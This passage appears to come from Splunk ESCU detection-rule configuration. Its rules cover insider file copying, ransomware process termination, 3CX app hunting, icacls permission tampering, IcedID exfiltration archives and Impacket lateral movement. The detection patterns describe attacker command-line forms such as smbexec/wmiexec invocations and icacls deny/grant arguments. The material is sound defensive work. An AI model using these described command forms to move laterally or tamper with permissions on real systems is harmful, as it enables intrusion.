frequency copying/moving of files in network share as part of information sabotage. This anomaly event can be a good indicator of insider trying to sabotage data by transfering classified or internal files within network share to exfitrate it after or to lure evidence of insider attack to other user. This behavior may catch several noise if network share is a common place for classified or internal document processing. action.escu.how_to_implement = o successfully implement this search, you need to be ingesting Windows Security Event Logs with 5145 EventCode enabled. The Windows TA is also required. Also enable the object Audit access success/failure in your group policy. action.escu.known_false_positives = this behavior may seen in normal transfer of file within network if network share is common place for sharing documents. action.escu.creation_date = 2021-11-16 action.escu.modification_date = 2021-11-16 action.escu.confidence = high action.escu.full_search_name = ESCU - High Frequency Copy Of Files In Network Share - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Information Sabotage", "Insider Threat"] action.risk = 1 action.risk.param._risk_message = high frequency copy of document in network share $Share_Name$ from $Source_Address$ by $user$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 9}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - High Frequency Copy Of Files In Network Share - Rule action.correlationsearch.annotations = {"analytic_story": ["Information Sabotage", "Insider Threat"], "cis20": ["CIS 10"], "confidence": 30, "impact": 30, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1537"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `wineventlog_security` EventCode=5145 Relative_Target_Name IN ("*.doc","*.docx","*.xls","*.xlsx","*.ppt","*.pptx","*.log","*.txt","*.db","*.7z","*.zip","*.rar","*.tar","*.gz","*.jpg","*.gif","*.png","*.bmp","*.pdf","*.rtf","*.key") Object_Type=File Share_Name IN ("\\\\*\\C$","\\\\*\\IPC$","\\\\*\\admin$") Access_Mask= "0x2" | bucket _time span=5m | stats values(Relative_Target_Name) as valRelativeTargetName, values(Share_Name) as valShareName, values(Object_Type) as valObjectType, values(Access_Mask) as valAccessmask, values(src_port) as valSrcPort, values(Source_Address) as valSrcAddress count as numShareName by dest, _time, EventCode, user | eventstats avg(numShareName) as avgShareName, stdev(numShareName) as stdShareName, count as numSlots by dest, _time, EventCode, user | eval upperThreshold=(avgShareName + stdShareName *3) | eval isOutlier=if(avgShareName > 20 and avgShareName >= upperThreshold, 1, 0) | search isOutlier=1 | `high_frequency_copy_of_files_in_network_share_filter` [ESCU - High Process Termination Frequency - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic is designed to identify a high frequency of process termination events on a computer in a short period of time, which is a common behavior of ransomware malware before encrypting files. This technique is designed to avoid an exception error while accessing (docs, images, database and etc..) in the infected machine for encryption. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1486"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This analytic is designed to identify a high frequency of process termination events on a computer in a short period of time, which is a common behavior of ransomware malware before encrypting files. This technique is designed to avoid an exception error while accessing (docs, images, database and etc..) in the infected machine for encryption. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the Image (process full path of terminated process) from your endpoints. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA. action.escu.known_false_positives = admin or user tool that can terminate multiple process. action.escu.creation_date = 2022-09-14 action.escu.modification_date = 2022-09-14 action.escu.confidence = high action.escu.full_search_name = ESCU - High Process Termination Frequency - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["Clop Ransomware", "LockBit Ransomware", "BlackByte Ransomware", "Rhysida Ransomware", "Snake Keylogger"] action.risk = 1 action.risk.param._risk_message = High frequency process termination (more than 15 processes within 3s) detected on host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 72}, {"risk_object_field": "proc_terminated", "risk_object_type": "other", "risk_score": 72}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - High Process Termination Frequency - Rule action.correlationsearch.annotations = {"analytic_story": ["Clop Ransomware", "LockBit Ransomware", "BlackByte Ransomware", "Rhysida Ransomware", "Snake Keylogger"], "cis20": ["CIS 10"], "confidence": 80, "impact": 90, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1486"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventCode=5 |bin _time span=3s |stats values(Image) as proc_terminated min(_time) as firstTime max(_time) as lastTime count by _time dest EventCode ProcessID | where count >= 15 | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `high_process_termination_frequency_filter` [ESCU - Hunting 3CXDesktopApp Software - Rule] action.escu = 0 action.escu.enabled = 1 description = The hunting analytic outlined below is designed to detect any version of the 3CXDesktopApp, also known as the 3CX Desktop App, operating on either Mac or Windows systems. It is important to note that this particular analytic employs the Endpoint datamodel Processes node, which means that the file version information is not provided. Recently, 3CX has identified a vulnerability specifically in versions 18.12.407 and 18.12.416 of the desktop app. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1195.002"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The hunting analytic outlined below is designed to detect any version of the 3CXDesktopApp, also known as the 3CX Desktop App, operating on either Mac or Windows systems. It is important to note that this particular analytic employs the Endpoint datamodel Processes node, which means that the file version information is not provided. Recently, 3CX has identified a vulnerability specifically in versions 18.12.407 and 18.12.416 of the desktop app. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = There may be false positives generated due to the reliance on version numbers for identification purposes. Despite this limitation, the primary goal of this approach is to aid in the detection of the software within the environment. action.escu.creation_date = 2023-03-30 action.escu.modification_date = 2023-03-30 action.escu.confidence = high action.escu.full_search_name = ESCU - Hunting 3CXDesktopApp Software - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["3CX Supply Chain Attack"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Hunting 3CXDesktopApp Software - Rule action.correlationsearch.annotations = {"analytic_story": ["3CX Supply Chain Attack"], "cis20": ["CIS 10"], "confidence": 50, "cve": ["CVE-2023-29059"], "impact": 80, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1195.002"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=3CXDesktopApp.exe OR Processes.process_name="3CX Desktop App" by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `hunting_3cxdesktopapp_software_filter` [ESCU - Icacls Deny Command - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic identifies instances where an adversary modifies the security permissions of a particular file or directory. This technique is frequently observed in the tradecraft of Advanced Persistent Threats (APTs) and coinminer scripts. The purpose of this behavior is to actively evade detection and impede access to their associated files. By identifying these security permission changes, we can enhance our ability to detect and respond to potential threats, mitigating the impact of malicious activities on the system. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1222"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic identifies instances where an adversary modifies the security permissions of a particular file or directory. This technique is frequently observed in the tradecraft of Advanced Persistent Threats (APTs) and coinminer scripts. The purpose of this behavior is to actively evade detection and impede access to their associated files. By identifying these security permission changes, we can enhance our ability to detect and respond to potential threats, mitigating the impact of malicious activities on the system. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Unknown. It is possible some administrative scripts use ICacls. Filter as needed. action.escu.creation_date = 2023-06-06 action.escu.modification_date = 2023-06-06 action.escu.confidence = high action.escu.full_search_name = ESCU - Icacls Deny Command - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["XMRig", "Azorult", "Sandworm Tools"] action.risk = 1 action.risk.param._risk_message = Process name $process_name$ with deny argument executed by $user$ to change security permission of a specific file or directory on host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 72}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 72}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Icacls Deny Command - Rule action.correlationsearch.annotations = {"analytic_story": ["XMRig", "Azorult", "Sandworm Tools"], "cis20": ["CIS 10"], "confidence": 80, "impact": 90, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1222"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic identifies instances where an adversary modifies the security permissions of a particular file or directory. This technique is frequently observed in the tradecraft of Advanced Persistent Threats (APTs) and coinminer scripts. The purpose of this behavior is to actively evade detection and impede access to their associated files. By identifying these security permission changes, we can enhance our ability to detect and respond to potential threats, mitigating the impact of malicious activities on the system. action.notable.param.rule_title = Icacls Deny Command action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name IN( "icacls.exe", "cacls.exe", "xcacls.exe") AND Processes.process IN ("*/deny*", "*/D*") by Processes.parent_process_name Processes.parent_process Processes.process_name Processes.process Processes.process_guid Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `icacls_deny_command_filter` [ESCU - ICACLS Grant Command - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic identifies adversaries who manipulate the security permissions of specific files or directories by granting additional access. This technique is frequently observed in the tradecraft of Advanced Persistent Threats (APTs) and coinminer scripts. The objective behind this behavior is to actively evade detection mechanisms and tightly control access to their associated files. By identifying these security permission modifications, we can improve our ability to identify and respond to potential threats, thereby minimizing the impact of malicious activities on the system. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1222"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic identifies adversaries who manipulate the security permissions of specific files or directories by granting additional access. This technique is frequently observed in the tradecraft of Advanced Persistent Threats (APTs) and coinminer scripts. The objective behind this behavior is to actively evade detection mechanisms and tightly control access to their associated files. By identifying these security permission modifications, we can improve our ability to identify and respond to potential threats, thereby minimizing the impact of malicious activities on the system. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Unknown. Filter as needed. action.escu.creation_date = 2023-06-06 action.escu.modification_date = 2023-06-06 action.escu.confidence = high action.escu.full_search_name = ESCU - ICACLS Grant Command - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["XMRig", "Ransomware"] action.risk = 1 action.risk.param._risk_message = Process name $process_name$ with grant argument executed by $user$ to change security permission of a specific file or directory on host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 49}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - ICACLS Grant Command - Rule action.correlationsearch.annotations = {"analytic_story": ["XMRig", "Ransomware"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1222"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic identifies adversaries who manipulate the security permissions of specific files or directories by granting additional access. This technique is frequently observed in the tradecraft of Advanced Persistent Threats (APTs) and coinminer scripts. The objective behind this behavior is to actively evade detection mechanisms and tightly control access to their associated files. By identifying these security permission modifications, we can improve our ability to identify and respond to potential threats, thereby minimizing the impact of malicious activities on the system. action.notable.param.rule_title = ICACLS Grant Command action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name IN( "icacls.exe", "cacls.exe", "xcacls.exe") AND Processes.process IN ("*/grant*", "*/G*") by Processes.parent_process_name Processes.parent_process Processes.process_name Processes.process Processes.process_guid Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `icacls_grant_command_filter` [ESCU - IcedID Exfiltrated Archived File Creation - Rule] action.escu = 0 action.escu.enabled = 1 description = This search is to detect a suspicious file creation namely passff.tar and cookie.tar. This files are possible archived of stolen browser information like history and cookies in a compromised machine with IcedID. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1560.001", "T1560"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search is to detect a suspicious file creation namely passff.tar and cookie.tar. This files are possible archived of stolen browser information like history and cookies in a compromised machine with IcedID. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the process name, parent process, and command-line executions from your endpoints. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA. action.escu.known_false_positives = unknown action.escu.creation_date = 2021-07-30 action.escu.modification_date = 2021-07-30 action.escu.confidence = high action.escu.full_search_name = ESCU - IcedID Exfiltrated Archived File Creation - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["IcedID"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - IcedID Exfiltrated Archived File Creation - Rule action.correlationsearch.annotations = {"analytic_story": ["IcedID"], "cis20": ["CIS 10"], "confidence": 90, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1560.001", "T1560"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventCode= 11 (TargetFilename = "*\\passff.tar" OR TargetFilename = "*\\cookie.tar") |stats count min(_time) as firstTime max(_time) as lastTime by TargetFilename EventCode process_id process_name dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `icedid_exfiltrated_archived_file_creation_filter` [ESCU - Impacket Lateral Movement Commandline Parameters - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for the presence of suspicious commandline parameters typically present when using Impacket tools. Impacket is a collection of python classes meant to be used with Microsoft network protocols. There are multiple scripts that leverage impacket libraries like `wmiexec.py`, `smbexec.py`, `dcomexec.py` and `atexec.py` used to execute commands on remote endpoints. By default, these scripts leverage administrative shares and hardcoded parameters that can be used as a signature to detect its use. Red Teams and adversaries alike may leverage Impackets tools for lateral movement and remote code execution. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1021", "T1021.002", "T1021.003", "T1047", "T1543.003"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for the presence of suspicious commandline parameters typically present when using Impacket tools. Impacket is a collection of python classes meant to be used with Microsoft network protocols. There are multiple scripts that leverage impacket libraries like `wmiexec.py`, `smbexec.py`, `dcomexec.py` and `atexec.py` used to execute commands on remote endpoints. By default, these scripts leverage administrative shares and hardcoded parameters that can be used as a signature to detect its use. Red Teams and adversaries alike may leverage Impackets tools for lateral movement and remote code execution. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Although uncommon, Administrators may leverage Impackets tools to start a process on remote systems for system administration or automation use cases. action.escu.creation_date = 2023-06-13 action.escu.modification_date = 2023-06-13 action.escu.confidence = high action.escu.full_search_name = ESCU - Impacket Lateral Movement Commandline Parameters - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Active Directory Lateral Movement", "CISA AA22-277A", "WhisperGate", "Prestige Ransomware", "Volt Typhoon", "Graceful Wipe Out Attack", "Industroyer2", "Data Destruction"] action.risk = 1 action.risk.param._risk_message = Suspicious command line parameters on $dest$ may represent a lateral movement attack with Impackets tools action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 63}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Impacket Lateral Movement Commandline Parameters - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Lateral Movement", "CISA AA22-277A", "WhisperGate", "Prestige Ransomware", "Volt Typhoon", "Graceful Wipe Out Attack", "Industroyer2", "Data Destruction"], "cis20": ["CIS 10"], "confidence": 70, "impact": 90, "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1021", "T1021.002", "T1021.003", "T1047", "T1543.003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic looks for the presence of suspicious commandline parameters typically present when using Impacket tools. Impacket is a collection of python classes meant to be used with Microsoft network protocols. There are multiple scripts that leverage impacket libraries like `wmiexec.py`, `smbexec.py`, `dcomexec.py` and `atexec.py` used to execute commands on remote endpoints. By default, these scripts leverage administrative shares and hardcoded parameters that can be used as a signature to detect its use. Red Teams and adversaries alike may leverage Impackets tools for lateral movement and remote code execution. action.notable.param.rule_title = Impacket Lateral Movement Commandline Parameters action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=cmd.exe (Processes.process = "*/Q /c * \\\\127.0.0.1\\*$*" AND Processes.process IN ("*2>&1*","*2>&1*")) by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `impacket_lateral_movement_commandline_parameters_filter` [ESCU - Impacket Lateral Movement smbexec CommandLine Parameters - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic focuses on identifying suspicious command-line parameters commonly associated with the use of Impacket wmiexec.py. Impacket is a set of Python classes designed for working with Microsoft network protocols, and it includes several scripts like wmiexec.py, smbexec.py, dcomexec.py, and atexec.py that enable command execution on remote endpoints. These scripts typically utilize administrative shares and hardcoded parameters, which can serve as signatures to detect their usage. Both Red Teams and adversaries may employ Impacket tools for lateral movement and remote code execution purposes. By monitoring for these specific command-line indicators, the analytic aims to detect potentially malicious activities related to Impacket tool usage. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1021", "T1021.002", "T1021.003", "T1047", "T1543.003"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic focuses on identifying suspicious command-line parameters commonly associated with the use of Impacket wmiexec.py. Impacket is a set of Python classes designed for working with Microsoft network protocols, and it includes several scripts like wmiexec.py, smbexec.py, dcomexec.py, and atexec.py that enable command execution on remote endpoints. These scripts typically utilize administrative shares and hardcoded parameters, which can serve as signatures to detect their usage. Both Red Teams and adversaries may employ Impacket tools for lateral movement and remote code execution purposes. By monitoring for these specific command-line indicators, the analytic aims to detect potentially malicious activities related to Impacket tool usage. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Although uncommon, Administrators may leverage Impackets tools to start a process on remote systems for system administration or automation use cases. action.escu.creation_date = 2023-06-13 action.escu.modification_date = 2023-06-13 action.escu.confidence = high action.escu.full_search_name = ESCU - Impacket Lateral Movement smbexec CommandLine Parameters - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Active Directory Lateral Movement", "CISA AA22-277A", "WhisperGate", "Prestige Ransomware", "Volt Typhoon", "Graceful Wipe Out Attack", "Industroyer2", "Data Destruction"] action.risk = 1 action.risk.param._risk_message = Suspicious command-line parameters on $dest$ may represent lateral movement using smbexec. action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 63}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Impacket Lateral Movement smbexec CommandLine Parameters - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Lateral Movement", "CISA AA22-277A", "WhisperGate", "Prestige Ransomware", "Volt Typhoon", "Graceful Wipe Out Attack", "Industroyer2", "Data Destruction"], "cis20": ["CIS 10"], "confidence": 70, "impact": 90, "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1021", "T1021.002", "T1021.003", "T1047", "T1543.003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic focuses on identifying suspicious command-line parameters commonly associated with the use of Impacket wmiexec.py. Impacket is a set of Python classes designed for working with Microsoft network protocols, and it includes several scripts like wmiexec.py, smbexec.py, dcomexec.py, and atexec.py that enable command execution on remote endpoints. These scripts typically utilize administrative shares and hardcoded parameters, which can serve as signatures to detect their usage. Both Red Teams and adversaries may employ Impacket tools for lateral movement and remote code execution purposes. By monitoring for these specific command-line indicators, the analytic aims to detect potentially malicious activities related to Impacket tool usage. action.notable.param.rule_title = Impacket Lateral Movement smbexec CommandLine Parameters action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=cmd.exe by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | where match(process, "(?i)cmd\.exe\s+\/Q\s+\/c") AND match(process,"(?i)echo\s+cd") AND match(process, "(?i)\\__output") AND match(process, "(?i)C:\\\\Windows\\\\[a-zA-Z]{1,8}\\.bat") AND match(process, "\\\\127\.0\.0\.1\\.*") | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `impacket_lateral_movement_smbexec_commandline_parameters_filter` [ESCU - Impacket Lateral Movement WMIExec Commandline Parameters - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for the presence of suspicious commandline parameters typically present when using Impacket tools. Impacket is a collection of python classes meant to be used with Microsoft network protocols. There are multiple scripts that leverage impacket libraries like `wmiexec.py`, `smbexec.py`, `dcomexec.py` and `atexec.py` used to execute commands on remote endpoints. By default, these scripts leverage administrative shares and hardcoded parameters that can be used as a signature to detect its use. Red Teams and adversaries alike may leverage Impackets tools for lateral movement and remote code execution. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1021", "T1021.002", "T1021.003", "T1047", "T1543.003"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for the presence of suspicious commandline parameters typically present when using Impacket tools. Impacket is a collection of python classes meant to be used with Microsoft network protocols. There are multiple scripts that leverage impacket libraries like `wmiexec.py`, `smbexec.py`, `dcomexec.py` and `atexec.py` used to execute commands on remote endpoints. By default, these scripts leverage administrative shares and hardcoded parameters that can be used as a signature to detect its use. Red Teams and adversaries alike may leverage Impackets tools for lateral movement and remote code execution. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Although uncommon, Administrators may leverage Impackets tools to start a process on remote systems for system administration or automation use cases. action.escu.creation_date = 2023-06-13 action.escu.modification_date = 2023-06-13 action.escu.confidence = high action.escu.full_search_name = ESCU - Impacket Lateral Movement WMIExec Commandline Parameters - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Active Directory Lateral Movement", "CISA AA22-277A", "WhisperGate", "Prestige Ransomware", "Volt Typhoon", "Graceful Wipe Out Attack", "Industroyer2", "Data Destruction"] action.risk = 1 action.risk.param._risk_message = Suspicious command-line parameters on $dest$ may represent lateral movement using wmiexec. action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 63}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Impacket Lateral Movement WMIExec Commandline Parameters - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Lateral Movement", "CISA AA22-277A", "WhisperGate", "Prestige Ransomware", "Volt 